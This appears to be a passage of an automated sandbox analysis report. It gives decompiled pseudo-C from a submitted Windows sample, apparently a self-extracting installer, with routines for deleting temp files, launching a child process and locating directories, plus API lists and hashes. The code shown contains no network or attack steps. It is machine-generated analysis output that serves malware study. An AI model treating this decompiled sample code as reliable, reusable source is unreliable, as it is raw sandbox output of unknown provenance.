                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
                                                                                                                                                                                                      • API String ID: 1979080616-3703068183
                                                                                                                                                                                                      • Opcode ID: d6e3fed9c20e5ba5fcbd767cc350e8486d4645ff308ecef5ca872a0e64f194cc
                                                                                                                                                                                                      • Instruction ID: d39dbde33166f5f78f0610cd2aebde66c57e1e2112ddb3787a9a4b8e6744f436
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d6e3fed9c20e5ba5fcbd767cc350e8486d4645ff308ecef5ca872a0e64f194cc
                                                                                                                                                                                                      • Instruction Fuzzy Hash: DA310872B00B056BCB14DB3AAD455BE779BABC1308B04E17AA40EB2591DBF08E458691
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      C-Code - Quality: 86%
                                                                                                                                                                                                      			E00E72390(CHAR* __ecx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v276;
                                                                                                                                                                                                      				char _v280;
                                                                                                                                                                                                      				char _v284;
                                                                                                                                                                                                      				struct _WIN32_FIND_DATAA _v596;
                                                                                                                                                                                                      				struct _WIN32_FIND_DATAA _v604;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t21;
                                                                                                                                                                                                      				int _t36;
                                                                                                                                                                                                      				void* _t46;
                                                                                                                                                                                                      				void* _t62;
                                                                                                                                                                                                      				void* _t63;
                                                                                                                                                                                                      				CHAR* _t65;
                                                                                                                                                                                                      				void* _t66;
                                                                                                                                                                                                      				signed int _t67;
                                                                                                                                                                                                      				signed int _t69;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t69 = (_t67 & 0xfffffff8) - 0x254;
                                                                                                                                                                                                      				_t21 =  *0xe78004; // 0xd47724e2
                                                                                                                                                                                                      				_t22 = _t21 ^ _t69;
                                                                                                                                                                                                      				_v8 = _t21 ^ _t69;
                                                                                                                                                                                                      				_t65 = __ecx;
                                                                                                                                                                                                      				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
                                                                                                                                                                                                      					L10:
                                                                                                                                                                                                      					_pop(_t62);
                                                                                                                                                                                                      					_pop(_t66);
                                                                                                                                                                                                      					_pop(_t46);
                                                                                                                                                                                                      					return E00E76CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					E00E71680( &_v276, 0x104, __ecx);
                                                                                                                                                                                                      					_t58 = 0x104;
                                                                                                                                                                                                      					E00E716B3( &_v280, 0x104, "*");
                                                                                                                                                                                                      					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
                                                                                                                                                                                                      					_t63 = _t22;
                                                                                                                                                                                                      					if(_t63 == 0xffffffff) {
                                                                                                                                                                                                      						goto L10;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						goto L3;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					do {
                                                                                                                                                                                                      						L3:
                                                                                                                                                                                                      						_t58 = 0x104;
                                                                                                                                                                                                      						E00E71680( &_v276, 0x104, _t65);
                                                                                                                                                                                                      						if((_v604.ftCreationTime & 0x00000010) == 0) {
                                                                                                                                                                                                      							_t58 = 0x104;
                                                                                                                                                                                                      							E00E716B3( &_v276, 0x104,  &(_v596.dwReserved1));
                                                                                                                                                                                                      							SetFileAttributesA( &_v280, 0x80);
                                                                                                                                                                                                      							DeleteFileA( &_v280);
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
                                                                                                                                                                                                      								E00E716B3( &_v276, 0x104,  &(_v596.cFileName));
                                                                                                                                                                                                      								_t58 = 0x104;
                                                                                                                                                                                                      								E00E7658A( &_v280, 0x104, 0xe71140);
                                                                                                                                                                                                      								E00E72390( &_v284);
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t36 = FindNextFileA(_t63,  &_v596); // executed
                                                                                                                                                                                                      					} while (_t36 != 0);
                                                                                                                                                                                                      					FindClose(_t63); // executed
                                                                                                                                                                                                      					_t22 = RemoveDirectoryA(_t65); // executed
                                                                                                                                                                                                      					goto L10;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}





















                                                                                                                                                                                                      0x00e72398
                                                                                                                                                                                                      0x00e7239e
                                                                                                                                                                                                      0x00e723a3
                                                                                                                                                                                                      0x00e723a5
                                                                                                                                                                                                      0x00e723ae
                                                                                                                                                                                                      0x00e723b3
                                                                                                                                                                                                      0x00e724cb
                                                                                                                                                                                                      0x00e724d2
                                                                                                                                                                                                      0x00e724d3
                                                                                                                                                                                                      0x00e724d4
                                                                                                                                                                                                      0x00e724df
                                                                                                                                                                                                      0x00e723c2
                                                                                                                                                                                                      0x00e723d1
                                                                                                                                                                                                      0x00e723db
                                                                                                                                                                                                      0x00e723e4
                                                                                                                                                                                                      0x00e723f6
                                                                                                                                                                                                      0x00e723fc
                                                                                                                                                                                                      0x00e72401
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e72407
                                                                                                                                                                                                      0x00e72407
                                                                                                                                                                                                      0x00e72408
                                                                                                                                                                                                      0x00e72411
                                                                                                                                                                                                      0x00e7241f
                                                                                                                                                                                                      0x00e7247a
                                                                                                                                                                                                      0x00e72483
                                                                                                                                                                                                      0x00e72495
                                                                                                                                                                                                      0x00e724a3
                                                                                                                                                                                                      0x00e72421
                                                                                                                                                                                                      0x00e7242f
                                                                                                                                                                                                      0x00e72453
                                                                                                                                                                                                      0x00e7245d
                                                                                                                                                                                                      0x00e72466
                                                                                                                                                                                                      0x00e72472
                                                                                                                                                                                                      0x00e72472
                                                                                                                                                                                                      0x00e7242f
                                                                                                                                                                                                      0x00e724af
                                                                                                                                                                                                      0x00e724b5
                                                                                                                                                                                                      0x00e724be
                                                                                                                                                                                                      0x00e724c5
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e724c5

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • FindFirstFileA.KERNELBASE(?,00E78A3A,00E711F4,00E78A3A,00000000,?,?), ref: 00E723F6
                                                                                                                                                                                                      • lstrcmpA.KERNEL32(?,00E711F8), ref: 00E72427
                                                                                                                                                                                                      • lstrcmpA.KERNEL32(?,00E711FC), ref: 00E7243B
                                                                                                                                                                                                      • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00E72495
                                                                                                                                                                                                      • DeleteFileA.KERNEL32(?), ref: 00E724A3
                                                                                                                                                                                                      • FindNextFileA.KERNELBASE(00000000,00000010), ref: 00E724AF
                                                                                                                                                                                                      • FindClose.KERNELBASE(00000000), ref: 00E724BE
                                                                                                                                                                                                      • RemoveDirectoryA.KERNELBASE(00E78A3A), ref: 00E724C5
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 836429354-0
                                                                                                                                                                                                      • Opcode ID: a616d0dd21c816589ed987e20e80283b21deb47e0e9a77e180ebed7b1073a5e6
                                                                                                                                                                                                      • Instruction ID: af5c98771183e0f43ff9a9fbb1fb7a8dc045fdffc3e45aaeb43839d875bd8a0c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a616d0dd21c816589ed987e20e80283b21deb47e0e9a77e180ebed7b1073a5e6
                                                                                                                                                                                                      • Instruction Fuzzy Hash: EF3172316057409FD320EBA8DC89AEF73ECABC4315F04993DB65DA6290EB34994DC752
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 675 e73fef-e74010 676 e74016-e7403b CreateProcessA 675->676 677 e7410a-e7411a call e76ce0 675->677 678 e740c4-e74101 call e76285 GetLastError FormatMessageA call e744b9 676->678 679 e74041-e7406e WaitForSingleObject GetExitCodeProcess 676->679 691 e74106 678->691 681 e74091 call e7411b 679->681 682 e74070-e74077 679->682 689 e74096-e740b8 CloseHandle * 2 681->689 682->681 685 e74079-e7407b 682->685 685->681 688 e7407d-e74089 685->688 688->681 692 e7408b 688->692 693 e740ba-e740c0 689->693 694 e74108 689->694 691->694 692->681 693->694 695 e740c2 693->695 694->677 695->691
                                                                                                                                                                                                      C-Code - Quality: 84%
                                                                                                                                                                                                      			E00E73FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v524;
                                                                                                                                                                                                      				long _v528;
                                                                                                                                                                                                      				struct _PROCESS_INFORMATION _v544;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t20;
                                                                                                                                                                                                      				void* _t22;
                                                                                                                                                                                                      				int _t25;
                                                                                                                                                                                                      				intOrPtr* _t39;
                                                                                                                                                                                                      				signed int _t44;
                                                                                                                                                                                                      				void* _t49;
                                                                                                                                                                                                      				signed int _t50;
                                                                                                                                                                                                      				intOrPtr _t53;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t45 = __edx;
                                                                                                                                                                                                      				_t20 =  *0xe78004; // 0xd47724e2
                                                                                                                                                                                                      				_v8 = _t20 ^ _t50;
                                                                                                                                                                                                      				_t39 = __ecx;
                                                                                                                                                                                                      				_t49 = 1;
                                                                                                                                                                                                      				_t22 = 0;
                                                                                                                                                                                                      				if(__ecx == 0) {
                                                                                                                                                                                                      					L13:
                                                                                                                                                                                                      					return E00E76CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				asm("stosd");
                                                                                                                                                                                                      				asm("stosd");
                                                                                                                                                                                                      				asm("stosd");
                                                                                                                                                                                                      				asm("stosd");
                                                                                                                                                                                                      				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
                                                                                                                                                                                                      				if(_t25 == 0) {
                                                                                                                                                                                                      					 *0xe79124 = E00E76285();
                                                                                                                                                                                                      					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0); // executed
                                                                                                                                                                                                      					_t45 = 0x4c4;
                                                                                                                                                                                                      					E00E744B9(0, 0x4c4, _t39,  &_v524, 0x10, 0); // executed
                                                                                                                                                                                                      					L11:
                                                                                                                                                                                                      					_t49 = 0;
                                                                                                                                                                                                      					L12:
                                                                                                                                                                                                      					_t22 = _t49;
                                                                                                                                                                                                      					goto L13;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				WaitForSingleObject(_v544.hProcess, 0xffffffff);
                                                                                                                                                                                                      				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
                                                                                                                                                                                                      				_t44 = _v528;
                                                                                                                                                                                                      				_t53 =  *0xe78a28; // 0x0
                                                                                                                                                                                                      				if(_t53 == 0) {
                                                                                                                                                                                                      					_t34 =  *0xe79a2c; // 0x0
                                                                                                                                                                                                      					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
                                                                                                                                                                                                      						_t34 = _t44 & 0xff000000;
                                                                                                                                                                                                      						if((_t44 & 0xff000000) == 0xaa000000) {
                                                                                                                                                                                                      							 *0xe79a2c = _t44;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				E00E7411B(_t34, _t44);
                                                                                                                                                                                                      				CloseHandle(_v544.hThread);
                                                                                                                                                                                                      				CloseHandle(_v544);
                                                                                                                                                                                                      				if(( *0xe79a34 & 0x00000400) == 0 || _v528 >= 0) {
                                                                                                                                                                                                      					goto L12;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					goto L11;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}


















                                                                                                                                                                                                      0x00e73fef
                                                                                                                                                                                                      0x00e73ffa
                                                                                                                                                                                                      0x00e74001
                                                                                                                                                                                                      0x00e74008
                                                                                                                                                                                                      0x00e7400a
                                                                                                                                                                                                      0x00e7400b
                                                                                                                                                                                                      0x00e74010
                                                                                                                                                                                                      0x00e7410a
                                                                                                                                                                                                      0x00e7411a
                                                                                                                                                                                                      0x00e7411a
                                                                                                                                                                                                      0x00e7401c
                                                                                                                                                                                                      0x00e7401d
                                                                                                                                                                                                      0x00e7401e
                                                                                                                                                                                                      0x00e7401f
                                                                                                                                                                                                      0x00e74033
                                                                                                                                                                                                      0x00e7403b
                                                                                                                                                                                                      0x00e740ca
                                                                                                                                                                                                      0x00e740e9
                                                                                                                                                                                                      0x00e740f8
                                                                                                                                                                                                      0x00e74101
                                                                                                                                                                                                      0x00e74106
                                                                                                                                                                                                      0x00e74106
                                                                                                                                                                                                      0x00e74108
                                                                                                                                                                                                      0x00e74108
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e74108
                                                                                                                                                                                                      0x00e74049
                                                                                                                                                                                                      0x00e7405c
                                                                                                                                                                                                      0x00e74062
                                                                                                                                                                                                      0x00e74068
                                                                                                                                                                                                      0x00e7406e
                                                                                                                                                                                                      0x00e74070
                                                                                                                                                                                                      0x00e74077
                                                                                                                                                                                                      0x00e7407f
                                                                                                                                                                                                      0x00e74089
                                                                                                                                                                                                      0x00e7408b
                                                                                                                                                                                                      0x00e7408b
                                                                                                                                                                                                      0x00e74089
                                                                                                                                                                                                      0x00e74077
                                                                                                                                                                                                      0x00e74091
                                                                                                                                                                                                      0x00e7409c
                                                                                                                                                                                                      0x00e740a8
                                                                                                                                                                                                      0x00e740b8
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e740c2
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e740c2

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?,?,?,00000000), ref: 00E74033
                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00E74049
                                                                                                                                                                                                      • GetExitCodeProcess.KERNELBASE ref: 00E7405C
                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00E7409C
                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00E740A8
                                                                                                                                                                                                      • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00E740DC
                                                                                                                                                                                                      • FormatMessageA.KERNELBASE(00001000,00000000,00000000), ref: 00E740E9
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3183975587-0
                                                                                                                                                                                                      • Opcode ID: 7a27ee505cf18b896c01517a4508aaa2dc8832f402016fef6ed4038d55d7b755
                                                                                                                                                                                                      • Instruction ID: 96cd5e350243b2fe66a89abbd2abac0a658f8c705193938e3a69ac53884bf664
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7a27ee505cf18b896c01517a4508aaa2dc8832f402016fef6ed4038d55d7b755
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 71317EB1642218AFEB219B66DC49FAA77B8EBD4705F1091A9F50DF21A1C7304DC9CA21
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 70%
                                                                                                                                                                                                      			E00E72BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				void* __ebp;
                                                                                                                                                                                                      				long _t4;
                                                                                                                                                                                                      				void* _t6;
                                                                                                                                                                                                      				intOrPtr _t7;
                                                                                                                                                                                                      				void* _t9;
                                                                                                                                                                                                      				struct HINSTANCE__* _t12;
                                                                                                                                                                                                      				intOrPtr* _t17;
                                                                                                                                                                                                      				signed char _t19;
                                                                                                                                                                                                      				intOrPtr* _t21;
                                                                                                                                                                                                      				void* _t22;
                                                                                                                                                                                                      				void* _t24;
                                                                                                                                                                                                      				intOrPtr _t32;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t4 = GetVersion();
                                                                                                                                                                                                      				if(_t4 >= 0 && _t4 >= 6) {
                                                                                                                                                                                                      					_t12 = GetModuleHandleW(L"Kernel32.dll");
                                                                                                                                                                                                      					if(_t12 != 0) {
                                                                                                                                                                                                      						_t21 = GetProcAddress(_t12, "HeapSetInformation");
                                                                                                                                                                                                      						if(_t21 != 0) {
                                                                                                                                                                                                      							_t17 = _t21;
                                                                                                                                                                                                      							 *0xe7a288(0, 1, 0, 0);
                                                                                                                                                                                                      							 *_t21();
                                                                                                                                                                                                      							_t29 = _t24 - _t24;
                                                                                                                                                                                                      							if(_t24 != _t24) {
                                                                                                                                                                                                      								_t17 = 4;
                                                                                                                                                                                                      								asm("int 0x29");
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t20 = _a12;
                                                                                                                                                                                                      				_t18 = _a4;
                                                                                                                                                                                                      				 *0xe79124 = 0;
                                                                                                                                                                                                      				if(E00E72CAA(_a4, _a12, _t29, _t17) != 0) {
                                                                                                                                                                                                      					_t9 = E00E72F1D(_t18, _t20); // executed
                                                                                                                                                                                                      					_t22 = _t9; // executed
                                                                                                                                                                                                      					E00E752B6(0, _t18, _t21, _t22); // executed
                                                                                                                                                                                                      					if(_t22 != 0) {
                                                                                                                                                                                                      						_t32 =  *0xe78a3a; // 0x0
                                                                                                                                                                                                      						if(_t32 == 0) {
                                                                                                                                                                                                      							_t19 =  *0xe79a2c; // 0x0
                                                                                                                                                                                                      							if((_t19 & 0x00000001) != 0) {
                                                                                                                                                                                                      								E00E71F90(_t19, _t21, _t22);
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t6 =  *0xe78588; // 0x0
                                                                                                                                                                                                      				if(_t6 != 0) {
                                                                                                                                                                                                      					CloseHandle(_t6);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t7 =  *0xe79124; // 0x80070002
                                                                                                                                                                                                      				return _t7;
                                                                                                                                                                                                      			}


















                                                                                                                                                                                                      0x00e72c03
                                                                                                                                                                                                      0x00e72c0d
                                                                                                                                                                                                      0x00e72c18
                                                                                                                                                                                                      0x00e72c20
                                                                                                                                                                                                      0x00e72c2e
                                                                                                                                                                                                      0x00e72c32
                                                                                                                                                                                                      0x00e72c36
                                                                                                                                                                                                      0x00e72c3d
                                                                                                                                                                                                      0x00e72c43
                                                                                                                                                                                                      0x00e72c45
                                                                                                                                                                                                      0x00e72c47
                                                                                                                                                                                                      0x00e72c49
                                                                                                                                                                                                      0x00e72c4e
                                                                                                                                                                                                      0x00e72c4e
                                                                                                                                                                                                      0x00e72c47
                                                                                                                                                                                                      0x00e72c32
                                                                                                                                                                                                      0x00e72c20
                                                                                                                                                                                                      0x00e72c50
                                                                                                                                                                                                      0x00e72c54
                                                                                                                                                                                                      0x00e72c57
                                                                                                                                                                                                      0x00e72c64
                                                                                                                                                                                                      0x00e72c66
                                                                                                                                                                                                      0x00e72c6b
                                                                                                                                                                                                      0x00e72c6d
                                                                                                                                                                                                      0x00e72c74
                                                                                                                                                                                                      0x00e72c76
                                                                                                                                                                                                      0x00e72c7c
                                                                                                                                                                                                      0x00e72c7e
                                                                                                                                                                                                      0x00e72c87
                                                                                                                                                                                                      0x00e72c89
                                                                                                                                                                                                      0x00e72c89
                                                                                                                                                                                                      0x00e72c87
                                                                                                                                                                                                      0x00e72c7c
                                                                                                                                                                                                      0x00e72c74
                                                                                                                                                                                                      0x00e72c8e
                                                                                                                                                                                                      0x00e72c95
                                                                                                                                                                                                      0x00e72c98
                                                                                                                                                                                                      0x00e72c98
                                                                                                                                                                                                      0x00e72c9e
                                                                                                                                                                                                      0x00e72ca7

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetVersion.KERNEL32(?,00000002,00000000,?,00E76BB0,00E70000,00000000,00000002,0000000A), ref: 00E72C03
                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(Kernel32.dll,?,00E76BB0,00E70000,00000000,00000002,0000000A), ref: 00E72C18
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00E72C28
                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,00E76BB0,00E70000,00000000,00000002,0000000A), ref: 00E72C98
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Handle$AddressCloseModuleProcVersion
                                                                                                                                                                                                      • String ID: HeapSetInformation$Kernel32.dll
                                                                                                                                                                                                      • API String ID: 62482547-3460614246
                                                                                                                                                                                                      • Opcode ID: 96774fc2334e9f50b9fba341b4d222573f06be09083e71e7dbebc99e2632d3d8
                                                                                                                                                                                                      • Instruction ID: bb7c5a1e5d74bd3aebcdf69ab2d16843c506333a4b944c0d88f2ad584158cab2
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 96774fc2334e9f50b9fba341b4d222573f06be09083e71e7dbebc99e2632d3d8
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 371129313003415FD721ABB7AC48A2F77A9DB94384B09A02DFA0CF3251DA30DC859661
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E00E76F40() {
                                                                                                                                                                                                      
                                                                                                                                                                                                      				SetUnhandledExceptionFilter(E00E76EF0); // executed
                                                                                                                                                                                                      				return 0;
                                                                                                                                                                                                      			}



                                                                                                                                                                                                      0x00e76f45
                                                                                                                                                                                                      0x00e76f4d

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 00E76F45
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3192549508-0
                                                                                                                                                                                                      • Opcode ID: d4c767c87ef2d538ca6c04d3b075b2898a757fe8a3b553693bc0e028ce47d6a1
                                                                                                                                                                                                      • Instruction ID: 336b5488044b6bc0f5233cbdce74d078bf34dc5c7eb17a23ffdb12457ff992fa
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d4c767c87ef2d538ca6c04d3b075b2898a757fe8a3b553693bc0e028ce47d6a1
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 529002A42626004BA6505B719D1946975919B8D616BC5A470A019E4494DB6041849522
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 232 e755a0-e755d9 call e7468f LocalAlloc 235 e755fd-e7560c call e7468f 232->235 236 e755db-e755f1 call e744b9 call e76285 232->236 242 e75632-e75643 lstrcmpA 235->242 243 e7560e-e75630 call e744b9 LocalFree 235->243 250 e755f6-e755f8 236->250 244 e75645 242->244 245 e7564b-e75659 LocalFree 242->245 243->250 244->245 248 e75696-e7569c 245->248 249 e7565b-e7565d 245->249 255 e756a2-e756a8 248->255 256 e7589f-e758b5 call e76517 248->256 252 e7565f-e75667 249->252 253 e75669 249->253 254 e758b7-e758c7 call e76ce0 250->254 252->253 257 e7566b-e7567a call e75467 252->257 253->257 255->256 260 e756ae-e756c1 GetTempPathA 255->260 256->254 270 e75680-e75691 call e744b9 257->270 271 e7589b-e7589d 257->271 264 e756f3-e75711 call e71781 260->264 265 e756c3-e756c9 call e75467 260->265 275 e75717-e75729 GetDriveTypeA 264->275 276 e7586c-e75890 GetWindowsDirectoryA call e7597d 264->276 269 e756ce-e756d0 265->269 269->271 273 e756d6-e756df call e72630 269->273 270->250 271->254 273->264 286 e756e1-e756ed call e75467 273->286 280 e75730-e75740 GetFileAttributesA 275->280 281 e7572b-e7572e 275->281 276->264 287 e75896 276->287 284 e75742-e75745 280->284 285 e7577e-e7578f call e7597d 280->285 281->280 281->284 289 e75747-e7574f 284->289 290 e7576b 284->290 298 e757b2-e757bf call e72630 285->298 299 e75791-e7579e call e72630 285->299 286->264 286->271 287->271 292 e75771-e75779 289->292 294 e75751-e75753 289->294 290->292 297 e75864-e75866 292->297 294->292 295 e75755-e75762 call e76952 294->295 295->290 308 e75764-e75769 295->308 297->275 297->276 306 e757d3-e757f8 call e7658a GetFileAttributesA 298->306 307 e757c1-e757cd GetWindowsDirectoryA 298->307 299->290 309 e757a0-e757b0 call e7597d 299->309 314 e7580a 306->314 315 e757fa-e75808 CreateDirectoryA 306->315 307->306 308->285 308->290 309->290 309->298 316 e7580d-e7580f 314->316 315->316 317 e75827-e7585c SetFileAttributesA call e71781 call e75467 316->317 318 e75811-e75825 316->318 317->271 323 e7585e 317->323 318->297 323->297
                                                                                                                                                                                                      C-Code - Quality: 92%
                                                                                                                                                                                                      			E00E755A0(void* __eflags) {
